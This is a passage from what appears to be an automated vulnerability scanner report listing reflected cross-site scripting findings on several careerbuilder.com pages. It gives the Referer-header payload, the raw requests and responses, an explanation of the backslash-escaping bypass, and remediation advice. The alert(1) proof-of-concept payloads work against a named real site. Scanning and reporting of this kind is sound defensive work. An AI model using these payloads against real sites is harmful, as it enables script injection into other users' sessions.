The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /JobSeeker/Jobs/JobQuery.aspx HTTP/1.1
Host: www.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=816d3\'%3balert(1)//0cc15065b6
Response (redirected)
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 187887
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: jobresults.aspx:mxdl41=pg=1&sc=-1&sd=0; path=/
Set-Cookie: CB%5FSID=f07c2160440d4e08844a6cec09658bf7-343071216-wl-6; domain=.careerbuilder.com; path=/; HttpOnly
Set-Cookie: BID=X13ACF19327AEAC6504D012A7B391507FFE940DF28A9AA48A0F60C82D7C8BF4A656E193F86871B73B3A745E18F06665B11; domain=.careerbuilder.com; expires=Mon, 14-Nov-2011 22:33:35 GMT; path=/; HttpOnly
Set-Cookie: PU=0; domain=.careerbuilder.com; expires=Sun, 14-Nov-2010 22:48:36 GMT; path=/
X-Powered-By: ASP.NET
X-PBY: BEAR22
Date: Sun, 14 Nov 2010 22:33:36 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="HTMLTag" xml:lang="en-US" lang="en-US"> <head><title> Job Se ...[SNIP]... pe'; s_cb.eVar8='JS_FindJobs - Job Results'; s_cb.eVar11='NotRegistered'; s_cb.eVar14=', '; s_cb.eVar15='NO_NotRegistered'; s_cb.eVar16='natural (google) - 816d3\\';alert(1)//0cc15065b6'; /************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/ var s_code=s_cb.t();if(s_code)document.write(s_code)//--> ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 49ba7\'%3balert(1)//7350fda0f95 was submitted in the Referer HTTP header. This input was echoed as 49ba7\\';alert(1)//7350fda0f95 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /JobSeeker/Jobs/JobResults.aspx HTTP/1.1
Host: www.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=49ba7\'%3balert(1)//7350fda0f95
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 186291
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: jobresults.aspx:mxdl41=pg=1&sc=-1&sd=0; path=/
Set-Cookie: CB%5FSID=9d3782ff7de24ff5b9ddcb5e1d05acc5-343071293-ww-6; domain=.careerbuilder.com; path=/; HttpOnly
Set-Cookie: BID=X13ACF19327AEAC65072DD04B5A48CA25F5DD95CFD78323174C6E7E36E668DD22C053EEEFD125B570C5EC81BFFC9671E6A; domain=.careerbuilder.com; expires=Mon, 14-Nov-2011 22:34:52 GMT; path=/; HttpOnly
Set-Cookie: PU=0; domain=.careerbuilder.com; expires=Sun, 14-Nov-2010 22:49:53 GMT; path=/
X-Powered-By: ASP.NET
X-PBY: BEAR33
Date: Sun, 14 Nov 2010 22:34:53 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="HTMLTag" xml:lang="en-US" lang="en-US"> <head><title> Job Se ...[SNIP]... pe'; s_cb.eVar8='JS_FindJobs - Job Results'; s_cb.eVar11='NotRegistered'; s_cb.eVar14=', '; s_cb.eVar15='NO_NotRegistered'; s_cb.eVar16='natural (google) - 49ba7\\';alert(1)//7350fda0f95'; /************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/ var s_code=s_cb.t();if(s_code)document.write(s_code)//--> ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9afb2\'%3balert(1)//19710fa89d5 was submitted in the Referer HTTP header. This input was echoed as 9afb2\\';alert(1)//19710fa89d5 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /JobSeeker/Jobs/JobResults.aspx?IPath=JRGCM&sc_cmp1=js_navg_ncc&ncc=%22Edward+Jones+(FA HTTP/1.1
Host: www.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=9afb2\'%3balert(1)//19710fa89d5
Response (redirected)
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 35278
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: jobresults.aspx:mxdl41=pg=1&sc=-1&sd=0; path=/
Set-Cookie: CB%5FSID=00ee70a8eaf84d37b4c80cb432dc402f-343075004-w3-6; domain=.careerbuilder.com; path=/; HttpOnly
Set-Cookie: BID=X13ACF19327AEAC650E005A3B4D0F7A37D17B3F768CA09C8188866ADAE4772E4DCB6463293FBA1FF4A9D942F83825DC347; domain=.careerbuilder.com; expires=Mon, 14-Nov-2011 23:36:44 GMT; path=/; HttpOnly
Set-Cookie: PU=0; domain=.careerbuilder.com; expires=Sun, 14-Nov-2010 23:51:45 GMT; path=/
X-Powered-By: ASP.NET
X-PBY: BEAR3
Date: Sun, 14 Nov 2010 23:36:45 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="HTMLTag" xml:lang="en-US" lang="en-US"> <head><title> Edward ...[SNIP]... pe'; s_cb.eVar8='JS_FindJobs - Job Results'; s_cb.eVar11='NotRegistered'; s_cb.eVar14=', '; s_cb.eVar15='NO_NotRegistered'; s_cb.eVar16='natural (google) - 9afb2\\';alert(1)//19710fa89d5'; /************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/ var s_code=s_cb.t();if(s_code)document.write(s_code)//--> ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 962e5\'%3balert(1)//e6e15f0f674 was submitted in the Referer HTTP header. This input was echoed as 962e5\\';alert(1)//e6e15f0f674 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /JobSeeker/Resumes/HourlyResume.aspx HTTP/1.1
Host: www.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=962e5\'%3balert(1)//e6e15f0f674
Response (redirected)
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 28721
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: CB%5FSID=25427e09788b492cad7382979372fe0f-343071357-x2-6; domain=.careerbuilder.com; path=/; HttpOnly
Set-Cookie: BID=X13ACF19327AEAC650AC9C21D9414FA081B9EC77A061EAD7E37B5C3AA423D81F33886D4F9E97936B2D443D9CD78ED441B7; domain=.careerbuilder.com; expires=Mon, 14-Nov-2011 22:35:57 GMT; path=/; HttpOnly
X-Powered-By: ASP.NET
X-PBY: BEAR38
Date: Sun, 14 Nov 2010 22:35:57 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="HTMLTag" xml:lang="en-US" lang="en-US"> <head><title> Post R ...[SNIP]... t Resume - Create'; s_cb.eVar8='JS_PostResumes - Post Resume - Create'; s_cb.eVar11='NotRegistered'; s_cb.eVar15='NO_NotRegistered'; s_cb.eVar16='natural (google) - 962e5\\';alert(1)//e6e15f0f674'; /************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/ var s_code=s_cb.t();if(s_code)document.write(s_code)//--> ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bd7da\'%3balert(1)//5262b82cea7 was submitted in the Referer HTTP header. This input was echoed as bd7da\\';alert(1)//5262b82cea7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /Jobs/Company/CCBCONVXXXXX423122/Miami-Herald-Media-Company/ HTTP/1.1
Host: www.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=bd7da\'%3balert(1)//5262b82cea7
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 42088
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: CB%5FSID=80649caadc584de391105835ea0644f2-343071299-x6-6; domain=.careerbuilder.com; path=/; HttpOnly
Set-Cookie: BID=X13ACF19327AEAC6507AED095309BD259F07CE50691A2F38005C49B15140BCCFBAEC1F75473445F7EF756BDD8E17162074; domain=.careerbuilder.com; expires=Mon, 14-Nov-2011 22:34:59 GMT; path=/; HttpOnly
X-Powered-By: ASP.NET
X-PBY: BEARWEBTEST1
Date: Sun, 14 Nov 2010 22:34:59 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="HTMLTag" xml:lang="en-US" lang="en-US"> <head><title> Miami ...[SNIP]... mpany'; s_cb.eVar8='JS_FindJobs - Search By Company - Company Details'; s_cb.eVar11='NotRegistered'; s_cb.eVar15='NO_NotRegistered'; s_cb.eVar16='natural (google) - bd7da\\';alert(1)//5262b82cea7'; /************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/ var s_code=s_cb.t();if(s_code)document.write(s_code)//--> ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d97a1\'%3balert(1)//0af1415a808 was submitted in the Referer HTTP header. This input was echoed as d97a1\\';alert(1)//0af1415a808 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /PLI/R/AdvSearch.htm HTTP/1.1
Host: www.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=d97a1\'%3balert(1)//0af1415a808
Response (redirected)
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 46913
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: CB%5FSID=983ad0a969e34e809fd62c7e5b37e231-343071388-wn-6; domain=.careerbuilder.com; path=/; HttpOnly
Set-Cookie: BID=X13ACF19327AEAC6507975F3BCFF565BE23849239EC03A8D327C834CBF4E31872EA8CF1C1872C8B5B8877E2E8C535F2205; domain=.careerbuilder.com; expires=Mon, 14-Nov-2011 22:36:28 GMT; path=/; HttpOnly
X-Powered-By: ASP.NET
X-PBY: BEAR24
Date: Sun, 14 Nov 2010 22:36:28 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="HTMLTag" xml:lang="en-US" lang="en-US"> <head><title> Find t ...[SNIP]... Advanced Search - AL'; s_cb.eVar8='JS_FindJobs - Advanced Search - AL'; s_cb.eVar11='NotRegistered'; s_cb.eVar15='NO_NotRegistered'; s_cb.eVar16='natural (google) - d97a1\\';alert(1)//0af1415a808'; /************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/ var s_code=s_cb.t();if(s_code)document.write(s_code)//--> ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 504d9\'%3balert(1)//47263a58400 was submitted in the Referer HTTP header. This input was echoed as 504d9\\';alert(1)//47263a58400 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /PLI/R/JSToolkit.htm HTTP/1.1
Host: www.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=504d9\'%3balert(1)//47263a58400
Response (redirected)
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 34252
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: CB%5FSID=d9349376736248e99f3e206fc011126a-343071339-XE-6; domain=.careerbuilder.com; path=/; HttpOnly
Set-Cookie: BID=X13ACF19327AEAC650E17D2A66E2572248AC6564350CC7CC3D5C8EF322D24CA032ABA5DB1252052B544CE6AF6628246E89; domain=.careerbuilder.com; expires=Mon, 14-Nov-2011 22:35:38 GMT; path=/; HttpOnly
X-Powered-By: ASP.NET
X-PBY: BEAR45
Date: Sun, 14 Nov 2010 22:35:38 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="HTMLTag" xml:lang="en-US" lang="en-US"> <head><title> Job Se ...[SNIP]... s'; s_cb.prop1='Toolkit'; s_cb.eVar8='JS_Resources - Toolkit'; s_cb.eVar11='NotRegistered'; s_cb.eVar15='NO_NotRegistered'; s_cb.eVar16='natural (google) - 504d9\\';alert(1)//47263a58400'; /************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/ var s_code=s_cb.t();if(s_code)document.write(s_code)//--> ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6904b\'%3balert(1)//225b75150e was submitted in the Referer HTTP header. This input was echoed as 6904b\\';alert(1)//225b75150e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /PLI/R/ResDistribution.htm HTTP/1.1
Host: www.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=6904b\'%3balert(1)//225b75150e
Response (redirected)
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 28208
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: CB%5FSID=29d6ea0d88d54b33955bcf4f8c9d8068-343071442-wf-6; domain=.careerbuilder.com; path=/; HttpOnly
Set-Cookie: BID=X13ACF19327AEAC65074362015E37C52EB6DCB6E497CCDB7D440A5E0D4287DB981DA07F44489690A6D3936B5B81C7507DD; domain=.careerbuilder.com; expires=Mon, 14-Nov-2011 22:37:22 GMT; path=/; HttpOnly
X-Powered-By: ASP.NET
X-PBY: BEAR16
Date: Sun, 14 Nov 2010 22:37:23 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="HTMLTag" xml:lang="en-US" lang="en-US"> <head><title> Resume ...[SNIP]... uncher - Start'; s_cb.eVar8='JS_PostResumes - Resume Launcher - Start'; s_cb.eVar11='NotRegistered'; s_cb.eVar15='NO_NotRegistered'; s_cb.eVar16='natural (google) - 6904b\\';alert(1)//225b75150e'; /************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/ var s_code=s_cb.t();if(s_code)document.write(s_code)//--> ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 62d8b\'%3balert(1)//21eb2b8b09c was submitted in the Referer HTTP header. This input was echoed as 62d8b\\';alert(1)//21eb2b8b09c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /PLI/R/ResUpgrades.htm HTTP/1.1
Host: www.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=62d8b\'%3balert(1)//21eb2b8b09c
Response (redirected)
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 32019
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: CB%5FSID=4659eedfeb0e43a4ac7f2eaaa16d6cba-343071487-wx-6; domain=.careerbuilder.com; path=/; HttpOnly
Set-Cookie: BID=X13ACF19327AEAC650F95C4771AFC50068C8BDE313A6F80DF93030C645A0F6152663E4F8891CBF90BCD61656B8AB6A21AF; domain=.careerbuilder.com; expires=Mon, 14-Nov-2011 22:38:07 GMT; path=/; HttpOnly
X-Powered-By: ASP.NET
X-PBY: BEAR34
Date: Sun, 14 Nov 2010 22:38:07 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="HTMLTag" xml:lang="en-US" lang="en-US"> <head><title> Resume ...[SNIP]... ageWoman_U'; s_cb.eVar8='JS_PostResumes - ResumeUpgradeV2_SageWoman_U'; s_cb.eVar11='NotRegistered'; s_cb.eVar15='NO_NotRegistered'; s_cb.eVar16='natural (google) - 62d8b\\';alert(1)//21eb2b8b09c'; /************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/ var s_code=s_cb.t();if(s_code)document.write(s_code)//--> ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8ed05\'%3balert(1)//006510e2ce1 was submitted in the Referer HTTP header. This input was echoed as 8ed05\\';alert(1)//006510e2ce1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /PLI/R/StellarResume.htm HTTP/1.1
Host: www.careerbuilder.com
Accept: */*
Accept-Language: en
